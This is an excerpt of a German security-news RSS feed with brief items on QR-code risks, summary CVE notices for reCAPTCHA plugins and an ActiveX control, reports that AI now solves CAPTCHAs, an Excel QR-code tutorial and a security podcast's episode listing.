<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719.jpg" class="attachment-full size-full wp-post-image" alt="Quishing, QR-Code" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2023/10/QRCode-Hacker_shutterstock_2155211719-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="QR-Code als Sicherheitsfalle? 1"></p>
    QR-Codes auf Verpackungen, Plakaten oder in Bars verlocken, einfach das Smartphone daran zu halten. Trotz vieler Vorteile für Unternehmen und Konsumenten, rät Chester Wisniewski, Sicherheitsprofi bei Sophos, zu Vorsicht und Einzelfallprüfung.

<p>Tags: <a href="https://www.it-daily.net/thema/hacker">#Hacker</a> | <a href="https://www.it-daily.net/thema/phishing">#Phishing</a> | <a href="https://www.it-daily.net/thema/qr-code">#QR-Code</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-12034 | Advanced Google reCAPTCHA Plugin up to 1.25 on WordPress IP excessive authentication]]></title>
<description><![CDATA[A vulnerability was found in Advanced Google reCAPTCHA Plugin up to 1.25 on WordPress. It has been classified as problematic. This affects an unknown part of the component IP Handler. The manipulation leads to improper restriction of excessive authentication attempts.

This vulnerability is uniqu...]]></description>
<link>https://tsecurity.de/de/2514766/sicherheitsluecken/cve-2024-12034-advanced-google-recaptcha-plugin-up-to-125-on-wordpress-ip-excessive-authentication/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2514766/sicherheitsluecken/cve-2024-12034-advanced-google-recaptcha-plugin-up-to-125-on-wordpress-ip-excessive-authentication/</guid>
<pubDate>Tue, 24 Dec 2024 08:07:39 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.advanced_google_recaptcha_plugin">Advanced Google reCAPTCHA Plugin up to 1.25</a> on WordPress. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This affects an unknown part of the component <em>IP Handler</em>. The manipulation leads to improper restriction of excessive authentication attempts.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.289203">CVE-2024-12034</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CAPTCHA: Bot-Erkennung ist durch neue KI-Systeme am Ende]]></title>
<description><![CDATA[Nahezu jeder Nutzer dürfte bereits in die Situation gekommen sein, in Eile an eine Information kommen zu wollen, aber erst einmal an einem vorgeschalteten CAPTCHA zu scheitern. Während der Mensch so gestoppt wird, kommt die KI bereits schnell weiter.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/2512862/it-security-nachrichten/captcha-bot-erkennung-ist-durch-neue-ki-systeme-am-ende/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2512862/it-security-nachrichten/captcha-bot-erkennung-ist-durch-neue-ki-systeme-am-ende/</guid>
<pubDate>Mon, 23 Dec 2024 09:03:25 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,147723.html"><img hspace="5" border="0" align="left" alt="Logo, Captcha, Recaptcha, Captchas, v3" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57379.jpg"></a>
			Nahezu jeder Nutzer dürfte bereits in die Situation gekommen sein, in Eile an eine Information kommen zu wollen, aber erst einmal an einem vorgeschalteten CAPTCHA zu scheitern. Während der Mensch so gestoppt wird, kommt die KI bereits schnell weiter.			(<a href="https://winfuture.de/news,147723.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA['Yes, I am a Human': Bot Detection Is No Longer Working]]></title>
<description><![CDATA[The rise of AI has rendered traditional CAPTCHA tests increasingly ineffective, as bots can now "[solve] these puzzles in milliseconds using artificial intelligence (AI)," reports The Conversation. "How ironic. The tools designed to prove we're human are now obstructing us more than the machines ...]]></description>
<link>https://tsecurity.de/de/2510241/it-security-nachrichten/yes-i-am-a-human-bot-detection-is-no-longer-working/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2510241/it-security-nachrichten/yes-i-am-a-human-bot-detection-is-no-longer-working/</guid>
<pubDate>Sat, 21 Dec 2024 02:48:15 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The rise of AI has rendered traditional CAPTCHA tests increasingly ineffective, as bots can now "[solve] these puzzles in milliseconds using artificial intelligence (AI)," reports The Conversation. "How ironic. The tools designed to prove we're human are now obstructing us more than the machines they're supposed to be keeping at bay." The report warns that the imminent arrival of AI agents -- software programs designed to autonomously interact with websites on our behalf -- will further complicate matters. From the report: Developers are continually coming up with new ways to verify humans. Some systems, like Google's ReCaptcha v3 (introduced in 2018), don't ask you to solve puzzles anymore. Instead, they watch how you interact with a website. Do you move your cursor naturally? Do you type like a person? Humans have subtle, imperfect behaviors that bots still struggle to mimic. Not everyone likes ReCaptcha v3 because it raises privacy issues -- plus the web company needs to assess user scores to determine who is a bot, and the bots can beat the system anyway. There are alternatives that use similar logic, such as "slider" puzzles that ask users to move jigsaw pieces around, but these too can be overcome.
 
Some websites are now turning to biometrics to verify humans, such as fingerprint scans or voice recognition, while face ID is also a possibility. Biometrics are harder for bots to fake, but they come with their own problems -- privacy concerns, expensive tech and limited access for some users, say because they can't afford the relevant smartphone or can't speak because of a disability. The imminent arrival of AI agents will add another layer of complexity. It will mean we increasingly want bots to visit sites and do things on our behalf, so web companies will need to start distinguishing between "good" bots and "bad" bots. This area still needs a lot more consideration, but digital authentication certificates are proposed as one possible solution.
 
In sum, Captcha is no longer the simple, reliable tool it once was. AI has forced us to rethink how we verify people online, and it's only going to get more challenging as these systems get smarter. Whatever becomes the next technological standard, it's going to have to be easy to use for humans, but one step ahead of the bad actors. So the next time you find yourself clicking on blurry traffic lights and getting infuriated, remember you're part of a bigger fight. The future of proving humanity is still being written, and the bots won't be giving up any time soon.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status='Yes%2C+I+am+a+Human'%3A+Bot+Detection+Is+No+Longer+Working%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F24%2F12%2F20%2F2331225%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F24%2F12%2F20%2F2331225%2Fyes-i-am-a-human-bot-detection-is-no-longer-working%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/24/12/20/2331225/yes-i-am-a-human-bot-detection-is-no-longer-working?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['Yes, I am a Human': Bot Detection Is No Longer Working]]></title>
<description><![CDATA[The rise of AI has rendered traditional CAPTCHA tests increasingly ineffective, as bots can now "[solve] these puzzles in milliseconds using artificial intelligence (AI)," reports The Conversation. "How ironic. The tools designed to prove we're human are now obstructing us more than the machines ...]]></description>
<link>https://tsecurity.de/de/2510240/it-security-nachrichten/yes-i-am-a-human-bot-detection-is-no-longer-working/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2510240/it-security-nachrichten/yes-i-am-a-human-bot-detection-is-no-longer-working/</guid>
<pubDate>Sat, 21 Dec 2024 02:48:14 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The rise of AI has rendered traditional CAPTCHA tests increasingly ineffective, as bots can now "[solve] these puzzles in milliseconds using artificial intelligence (AI)," reports The Conversation. "How ironic. The tools designed to prove we're human are now obstructing us more than the machines they're supposed to be keeping at bay." The report warns that the imminent arrival of AI agents -- software programs designed to autonomously interact with websites on our behalf -- will further complicate matters. From the report: Developers are continually coming up with new ways to verify humans. Some systems, like Google's ReCaptcha v3 (introduced in 2018), don't ask you to solve puzzles anymore. Instead, they watch how you interact with a website. Do you move your cursor naturally? Do you type like a person? Humans have subtle, imperfect behaviors that bots still struggle to mimic. Not everyone likes ReCaptcha v3 because it raises privacy issues -- plus the web company needs to assess user scores to determine who is a bot, and the bots can beat the system anyway. There are alternatives that use similar logic, such as "slider" puzzles that ask users to move jigsaw pieces around, but these too can be overcome.
 
Some websites are now turning to biometrics to verify humans, such as fingerprint scans or voice recognition, while face ID is also a possibility. Biometrics are harder for bots to fake, but they come with their own problems -- privacy concerns, expensive tech and limited access for some users, say because they can't afford the relevant smartphone or can't speak because of a disability. The imminent arrival of AI agents will add another layer of complexity. It will mean we increasingly want bots to visit sites and do things on our behalf, so web companies will need to start distinguishing between "good" bots and "bad" bots. This area still needs a lot more consideration, but digital authentication certificates are proposed as one possible solution.
 
In sum, Captcha is no longer the simple, reliable tool it once was. AI has forced us to rethink how we verify people online, and it's only going to get more challenging as these systems get smarter. Whatever becomes the next technological standard, it's going to have to be easy to use for humans, but one step ahead of the bad actors. So the next time you find yourself clicking on blurry traffic lights and getting infuriated, remember you're part of a bigger fight. The future of proving humanity is still being written, and the bots won't be giving up any time soon.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status='Yes%2C+I+am+a+Human'%3A+Bot+Detection+Is+No+Longer+Working%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F24%2F12%2F20%2F2331225%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F24%2F12%2F20%2F2331225%2Fyes-i-am-a-human-bot-detection-is-no-longer-working%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/24/12/20/2331225/yes-i-am-a-human-bot-detection-is-no-longer-working?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-8739 | ReCaptcha Integration Plugin up to 1.2.5 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in ReCaptcha Integration Plugin up to 1.2.5 on WordPress and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting.

The identification of this vulnerability is CVE-2024-8739. The attack may be initiated rem...]]></description>
<link>https://tsecurity.de/de/2420915/sicherheitsluecken/cve-2024-8739-recaptcha-integration-plugin-up-to-125-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2420915/sicherheitsluecken/cve-2024-8739-recaptcha-integration-plugin-up-to-125-on-wordpress-cross-site-scripting/</guid>
<pubDate>Sat, 02 Nov 2024 11:22:37 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.recaptcha_integration_plugin">ReCaptcha Integration Plugin up to 1.2.5</a> on WordPress and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This issue affects some unknown processing. The manipulation leads to cross site scripting.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.282695">CVE-2024-8739</a>. The attack may be initiated remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[So erzeugen Sie mit Microsoft Excel einen QR-Code]]></title>
<description><![CDATA[In einem QR-Code lässt sich leicht und schnell eine Webadresse als Grafik umsetzen. Andere Personen können diesen Code im Anschluss daran mit ihrem Smartphone und einem QR-Code-Scanner einlesen und erhalten die Adresse entweder als Text angezeigt oder werden direkt mit der Website verbunden. 



...]]></description>
<link>https://tsecurity.de/de/2406254/windows-tipps/so-erzeugen-sie-mit-microsoft-excel-einen-qr-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2406254/windows-tipps/so-erzeugen-sie-mit-microsoft-excel-einen-qr-code/</guid>
<pubDate>Fri, 25 Oct 2024 08:06:46 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In einem QR-Code lässt sich leicht und schnell eine Webadresse als Grafik umsetzen. Andere Personen können diesen Code im Anschluss daran mit ihrem Smartphone und einem QR-Code-Scanner einlesen und erhalten die Adresse entweder als Text angezeigt oder werden direkt mit der Website verbunden. </p>



<p>Bei neuen Handys ist diese Funktionalität direkt in die Fotos-App eingebaut. QR-Code-Generatoren gibt es dutzendweise im Internet. Sie können diese Grafiken jedoch auch mit der „BILD“-Funktion von Excel erzeugen.</p>



<p>Dafür benötigen Sie dazu aber eine Website, die eine API (Schnittstelle) zu ihrem Generator bereitstellt. Eine solche Website ist beispielsweise <a href="https://goqr.me/de/api" target="_blank" rel="noreferrer noopener">https://goqr.me/de/api</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2472085","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Excel QR-Code","alt":"Excel QR-Code"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/pcw11_qrcode_RGBeci.jpg?quality=50&amp;strip=all" alt="Excel QR-Code" class="wp-image-2472085" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/09/pcw11_qrcode_RGBeci.jpg?quality=50&amp;strip=all 932w, https://b2c-contenthub.com/wp-content/uploads/2024/09/pcw11_qrcode_RGBeci.jpg?resize=300%2C230&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/09/pcw11_qrcode_RGBeci.jpg?resize=768%2C588&amp;quality=50&amp;strip=all 768w" width="932" height="714" sizes="(max-width: 932px) 100vw, 932px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Excel QR-Code" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Mit der Excel-Funktion „BILD“ und einem QR-Code-Generator im Internet können Sie auch mit Excel Webadressen in QR-Codes umwandeln.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Für unser Beispiel geben Sie in Excel in Zelle A1 die Adresse der Website ein, zum Beispiel www.pcwelt.de. In Zelle A2 schreiben Sie die Formel =BILD(“https://api.qrserver.com/v1/create-qrcode/?data=”&amp;A1&amp;””). </p>



		<div class="wp-block-product-widget-block product-widget">
			<div class="product-widget__block-title-wrapper">
				<h4 class="product-widget__block-title">
									</h4>
			</div>

			<div class="product-widget__content-wrapper">
									<div class="product-widget__title-wrapper">
						<h3 class="product-widget__title">Microsoft Office Home &amp; Business 2024 (PC/Mac)</h3>
					</div>
				
				
				
				<div class="product-widget__information">
											<div class="product-widget__information--rrp-wrapper">
								<span class="product-widget__information--rrp-label">
							Preis beim Test:								</span>
								<span class="product-widget__information--rrp-value">
								299								</span>
							</div>
						
											<div class="product-widget__pricing-details  ">
															<span class="product-widget__pricing-details--label">
									Best Prices Today:
								</span>
														<span class="product-widget__pricing-details--links-wrapper">
								<a class="product-widget__pricing-details--link" href="https://www.billiger.de/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=HOZUoSfTUcSgFdiMIpCMzOpOssNRnnZIdITBfsYWPc5WPzMHJ3FSFf3f31REaUt0ecftm8FFLys6hsaW54-vi2_RCiz62KE3h4B83lRNOhPY6qvGu699KB9B_DlT1uYj2x-qFuhWqJX&amp;mid=429384462194&amp;id=429384462194&amp;ts=20241025" target="_blank" data-vars-product-name="Microsoft Office Home &amp; Business 2024 (PC/Mac)" data-vars-product-id="2478985" data-vars-category="Professional Software" data-vars-manufacturer-id="10994" data-vars-manufacturer="Microsoft" data-vars-vendor="billiger,gtin,mpn,Microsoft,PC-WELT Software Store" data-vars-po="billiger,gtin,mpn" data-product="2478985" data-vars-link-position-id="005" data-vars-link-position="Product Sidebar" data-vars-outbound-link="https://www.billiger.de/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=HOZUoSfTUcSgFdiMIpCMzOpOssNRnnZIdITBfsYWPc5WPzMHJ3FSFf3f31REaUt0ecftm8FFLys6hsaW54-vi2_RCiz62KE3h4B83lRNOhPY6qvGu699KB9B_DlT1uYj2x-qFuhWqJX&amp;mid=429384462194&amp;id=429384462194&amp;ts=20241025">79,99 € bei  licenselounge24.de</a>											<span class="amp-bar"> | </span>
																		<a class="product-widget__pricing-details--link" href="https://www.billiger.de/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=CtIEwOjra-SVf28VzW0Dp4eF8ZBoGX1q-vMnUE5H3dD5p11Pk4U7aWZj1VSYb87f4kZKpwcYI7dv0Qos-tihN7LUdpqcsH2oeobGluePr4tIdPjMkmbrNoLIKlGOEbNK4ln1Kzi9pBzXbwjSZv0xp8&amp;mid=428136387996&amp;id=428136387996&amp;ts=20241025" target="_blank" data-vars-product-name="Microsoft Office Home &amp; Business 2024 (PC/Mac)" data-vars-product-id="2478985" data-vars-category="Professional Software" data-vars-manufacturer-id="10994" data-vars-manufacturer="Microsoft" data-vars-vendor="billiger,gtin,mpn,Microsoft,PC-WELT Software Store" data-vars-po="billiger,gtin,mpn" data-product="2478985" data-vars-link-position-id="005" data-vars-link-position="Product Sidebar" data-vars-outbound-link="https://www.billiger.de/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=CtIEwOjra-SVf28VzW0Dp4eF8ZBoGX1q-vMnUE5H3dD5p11Pk4U7aWZj1VSYb87f4kZKpwcYI7dv0Qos-tihN7LUdpqcsH2oeobGluePr4tIdPjMkmbrNoLIKlGOEbNK4ln1Kzi9pBzXbwjSZv0xp8&amp;mid=428136387996&amp;id=428136387996&amp;ts=20241025">99,90 € bei  ProductCodes.de</a>											<span class="amp-bar"> | </span>
																		<a class="product-widget__pricing-details--link" href="https://www.billiger.de/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=4MkjpmZn7BotiDOfdN0LnJe3tbSWKwr5TuIQX9BMq_76RmIsvl8L8V1vwHmahPbyop5eUIvJnUoAm-XbNzvUXLzwTXiQhb0ZMMkv2b_s0TIn8q4qoAhXB-Mk1Ee13C2pZ65OnR24lg71vpC-OFJi0Q&amp;mid=427280076044&amp;id=427280076044&amp;ts=20241025" target="_blank" data-vars-product-name="Microsoft Office Home &amp; Business 2024 (PC/Mac)" data-vars-product-id="2478985" data-vars-category="Professional Software" data-vars-manufacturer-id="10994" data-vars-manufacturer="Microsoft" data-vars-vendor="billiger,gtin,mpn,Microsoft,PC-WELT Software Store" data-vars-po="billiger,gtin,mpn" data-product="2478985" data-vars-link-position-id="005" data-vars-link-position="Product Sidebar" data-vars-outbound-link="https://www.billiger.de/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=4MkjpmZn7BotiDOfdN0LnJe3tbSWKwr5TuIQX9BMq_76RmIsvl8L8V1vwHmahPbyop5eUIvJnUoAm-XbNzvUXLzwTXiQhb0ZMMkv2b_s0TIn8q4qoAhXB-Mk1Ee13C2pZ65OnR24lg71vpC-OFJi0Q&amp;mid=427280076044&amp;id=427280076044&amp;ts=20241025">229,95 € bei  myOEM.de</a>							</span>
						</div>
									</div>
			</div>
		</div>

		


<p>Nach einem „Enter“ erscheint der Code als kleines Bild in Zelle B1. Um ihn zu vergrößern, gehen Sie im Ribbon „Start“ in dem Abschnitt „Zellen“ auf „Format“ und klicken zunächst auf „Zeilenhöhe“, dann auf „Spaltenbreite“. </p>



<p>Stellen Sie dort Werte ein, die hoch genug sind, um die Grafik gut am Bildschirm lesen zu können. Alternativ dazu klicken Sie mit der rechten Maustaste in die Zelle mit dem QR-Code und wählen „Bild in Zelle –› Platzieren über Zellen“. </p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/1919504/qr-codes-mit-privaten-daten-offline-erzeugen-simple-code-generator.html" target="_blank" rel="noreferrer noopener">QR-Codes mit privaten Daten erzeugen: So geht’s mit dem Simple Code Generator</a></p>



<p>Sie können die Grafik im Folgenden aus der Zelle herausziehen, in der Größe verändern und über die Zwischenablage in andere Anwendungen einfügen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2007-4982 | MW6 Technologies QRCode ActiveX up to 3.0.0.1 ActiveX Control mw6qrcode.dll path traversal (EDB-4420 / XFDB-36666)]]></title>
<description><![CDATA[A vulnerability was found in MW6 Technologies QRCode ActiveX up to 3.0.0.1. It has been classified as critical. This affects an unknown part in the library mw6qrcode.dll of the component ActiveX Control. The manipulation leads to path traversal.

This vulnerability is uniquely identified as CVE-2...]]></description>
<link>https://tsecurity.de/de/2371034/sicherheitsluecken/cve-2007-4982-mw6-technologies-qrcode-activex-up-to-3001-activex-control-mw6qrcodedll-path-traversal-edb-4420-xfdb-36666/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2371034/sicherheitsluecken/cve-2007-4982-mw6-technologies-qrcode-activex-up-to-3001-activex-control-mw6qrcodedll-path-traversal-edb-4420-xfdb-36666/</guid>
<pubDate>Mon, 07 Oct 2024 05:37:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.mw6_technologies:qrcode_activex">MW6 Technologies QRCode ActiveX up to 3.0.0.1</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This affects an unknown part in the library <em>mw6qrcode.dll</em> of the component <em>ActiveX Control</em>. The manipulation leads to path traversal.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.38877">CVE-2007-4982</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2007-4982 | MW6 Technologies QRCode ActiveX up to 3.0.0.1 ActiveX Control mw6qrcode.dll path traversal (EDB-4420 / XFDB-36666)]]></title>
<description><![CDATA[A vulnerability was found in MW6 Technologies QRCode ActiveX up to 3.0.0.1. It has been classified as critical. This affects an unknown part in the library mw6qrcode.dll of the component ActiveX Control. The manipulation leads to path traversal.

This vulnerability is uniquely identified as CVE-2...]]></description>
<link>https://tsecurity.de/de/2371033/sicherheitsluecken/cve-2007-4982-mw6-technologies-qrcode-activex-up-to-3001-activex-control-mw6qrcodedll-path-traversal-edb-4420-xfdb-36666/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2371033/sicherheitsluecken/cve-2007-4982-mw6-technologies-qrcode-activex-up-to-3001-activex-control-mw6qrcodedll-path-traversal-edb-4420-xfdb-36666/</guid>
<pubDate>Mon, 07 Oct 2024 05:36:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.mw6_technologies:qrcode_activex">MW6 Technologies QRCode ActiveX up to 3.0.0.1</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This affects an unknown part in the library <em>mw6qrcode.dll</em> of the component <em>ActiveX Control</em>. The manipulation leads to path traversal.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.38877">CVE-2007-4982</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Straßenbilder: KI löst Bilder-Captchas besser als der Mensch]]></title>
<description><![CDATA[Die bekannten Straßenbilder von Googles reCAPTCHA v2 sind schwer zu lösen - von Menschen. Die KI kann das mühelos, was eine Frage aufwirft. (Captcha, Google)]]></description>
<link>https://tsecurity.de/de/2357480/it-nachrichten/strassenbilder-ki-loest-bilder-captchas-besser-als-der-mensch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2357480/it-nachrichten/strassenbilder-ki-loest-bilder-captchas-besser-als-der-mensch/</guid>
<pubDate>Sat, 28 Sep 2024 16:45:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die bekannten Straßenbilder von Googles reCAPTCHA v2 sind schwer zu lösen - von Menschen. Die KI kann das mühelos, was eine Frage aufwirft. (<a href="https://www.golem.de/specials/captcha/">Captcha</a>, <a href="https://www.golem.de/specials/google/">Google</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=189364&amp;page=1&amp;ts=1727534102" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Yolo: Forscher lösen reCaptcha-Tests mit künstlicher Intelligenz | ZDNet.de]]></title>
<description><![CDATA[... IT-Sicherheit mit vorhandenen Ressource…27:31. S'abonner. Edisound · Flux ... Security · Unified Communications & Collaboration · Virtualisierung ...]]></description>
<link>https://tsecurity.de/de/2357374/it-security-nachrichten/yolo-forscher-loesen-recaptcha-tests-mit-kuenstlicher-intelligenz-zdnetde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2357374/it-security-nachrichten/yolo-forscher-loesen-recaptcha-tests-mit-kuenstlicher-intelligenz-zdnetde/</guid>
<pubDate>Sat, 28 Sep 2024 14:48:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b>-<b>Sicherheit</b> mit vorhandenen Ressource…27:31. S'abonner. Edisound · Flux ... Security · Unified Communications &amp; Collaboration · Virtualisierung ...]]></content:encoded>
</item>
<item>
<title><![CDATA[REKAST - Talkin' Bout [infosec] News 2024-09-23 #infosecnews #cybersecurity #podcast  #podcastclips]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 0x - Views:5 Join us LIVE on Mondays, 4:430pm EST.
Here's a byte-sized highlight reel of our weekly Podcast with BHIS and Friends. stories. (https://blubrry.com/bhis/) We discuss notable Infosec, and infosec-adjacent news stories. 

Chat with ...]]></description>
<link>https://tsecurity.de/de/2356938/it-security-video/rekast-talkin-bout-infosec-news-2024-09-23-infosecnews-cybersecurity-podcast-podcastclips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2356938/it-security-video/rekast-talkin-bout-infosec-news-2024-09-23-infosecnews-cybersecurity-podcast-podcastclips/</guid>
<pubDate>Sat, 28 Sep 2024 07:04:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/emVp5qN0xgk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Join us LIVE on Mondays, 4:430pm EST.<br />
Here's a byte-sized highlight reel of our weekly Podcast with BHIS and Friends. stories. (https://blubrry.com/bhis/) We discuss notable Infosec, and infosec-adjacent news stories. <br />
<br />
Chat with us on Discord! - <br />
https://discord.gg/bhis<br />
🔴webcast-live-chat<br />
<br />
Brought to you by: <br />
📄 Antisyphon Training<br />
https://www.antisyphontraining.com/<br />
<br />
▶️ This FULL EPISODE:<br />
https://youtube.com/live/_sCeVWOOt9A<br />
▶️ The next EPISODE:<br />
https://youtube.com/live/C2M1uKNmpFc<br />
<br />
🔗 Register for webcasts, summits, and workshops - <br />
https://poweredbybhis.com<br />
<br />
/// All News Stories From the Full Episode<br />
Story # 1: Pagers attack brings to life long-feared supply chain threat<br />
https://www.washingtonpost.com/technology/2024/09/19/hezbollah-pager-attack-supply-chain/<br />
<br />
Story # 2: Recaptcha Phish - John Hammond<br />
https://x.com/_JohnHammond/status/1834552797733274049<br />
https://github.com/JohnHammond/recaptcha-phish<br />
https://x.com/_JohnHammond/status/1836484080504049692<br />
<br />
Story # 2b: Clever ‘GitHub Scanner’ campaign abusing repos to push malware<br />
https://www.bleepingcomputer.com/news/security/clever-github-scanner-campaign-abusing-repos-to-push-malware/<br />
<br />
Story # 3: Lazarus Group Targets Developers in Fresh VMConnect Campaign<br />
